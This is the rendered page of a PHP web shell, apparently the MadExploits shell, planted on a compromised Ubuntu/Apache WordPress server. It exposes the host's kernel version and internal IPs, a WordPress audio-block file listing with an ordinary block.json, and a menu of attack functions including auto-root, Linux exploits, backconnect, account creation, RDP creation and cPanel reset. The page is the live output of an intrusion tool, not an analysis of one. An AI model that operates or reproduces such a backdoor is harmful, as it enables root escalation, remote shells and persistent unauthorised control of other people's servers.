Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cipd /
wp-includes /
blocks /
audio /
[ HOME SHELL ]
Name
Size
Permission
Action
block.json
1.28
KB
-rwxrwxr-x
editor-rtl.css
250
B
-rwxrwxr-x
editor-rtl.min.css
215
B
-rwxrwxr-x
editor.css
248
B
-rwxrwxr-x
editor.min.css
213
B
-rwxrwxr-x
style-rtl.css
171
B
-rwxrwxr-x
style-rtl.min.css
148
B
-rwxrwxr-x
style.css
171
B
-rwxrwxr-x
style.min.css
148
B
-rwxrwxr-x
theme-rtl.css
184
B
-rwxrwxr-x
theme-rtl.min.css
160
B
-rwxrwxr-x
theme.css
184
B
-rwxrwxr-x
theme.min.css
160
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : block.json
{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/audio", "title": "Audio", "category": "media", "description": "Embed a simple audio player.", "keywords": [ "music", "sound", "podcast", "recording" ], "textdomain": "default", "attributes": { "src": { "type": "string", "source": "attribute", "selector": "audio", "attribute": "src", "__experimentalRole": "content" }, "caption": { "type": "rich-text", "source": "rich-text", "selector": "figcaption", "__experimentalRole": "content" }, "id": { "type": "number", "__experimentalRole": "content" }, "autoplay": { "type": "boolean", "source": "attribute", "selector": "audio", "attribute": "autoplay" }, "loop": { "type": "boolean", "source": "attribute", "selector": "audio", "attribute": "loop" }, "preload": { "type": "string", "source": "attribute", "selector": "audio", "attribute": "preload" } }, "supports": { "anchor": true, "align": true, "spacing": { "margin": true, "padding": true, "__experimentalDefaultControls": { "margin": false, "padding": false } }, "interactivity": { "clientNavigation": true } }, "editorStyle": "wp-block-audio-editor", "style": "wp-block-audio" }
Close